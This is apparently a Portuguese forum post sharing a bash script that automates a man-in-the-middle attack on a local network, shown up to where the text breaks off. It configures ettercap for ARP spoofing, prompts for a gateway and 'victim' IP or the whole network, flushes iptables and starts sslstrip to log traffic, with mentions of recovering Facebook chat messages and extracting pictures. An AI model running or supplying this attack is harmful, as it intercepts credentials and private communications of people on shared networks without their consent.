UPDATED SCRIPT 27 / 4 - acrescentado tcpxtract
UPDATE: Como encontrar facebook mensagens de chat ...

Fiquei muito cansado de escrever comandos infinitamente, enquanto fazia pentesting minha rede. Então eu comecei a escrever um script para qualquer coisa que eu faço. Este script é o que eu mais uso sobretudo.

Eu ainda sou muito novo em Backtrack/Linux, mas esse script realmente funciona para mim e estou certo que outros novatos lá fora, pode colocá-lo em bom uso também.

Antes de mais nada, verifique se o etter.conf é padrão. Seu etter.conf está localizado em /etc/etter.conf - esta seção devem permanecer comentada:

Code:
# if you use iptables:
   #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
   #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Isto está assim porque meu ettercap uso para fazer o arpspoofing, mas eu não quero que ele faça a coisa com certificado falso (temos sslstrip para fazer o
trabalho).

Salve esse código para um novo arquivo de texto e salvar como anything.sh
(certifique-se de executar chmod, direito clique com botão direito do mouse->properties->permissions->check "is executable)

Code:
#!/bin/bash
echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
read -e NOYES
echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
read -e XTRACT
echo -n "What interface to use? ie wlan0: "
read -e IFACE
echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
read -e SESSION
echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e ROUTER
echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
read -e VICTIM
mkdir /root/$SESSION/
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
sslstrip -p -k -w /root/$SESSION/$SESSION.log &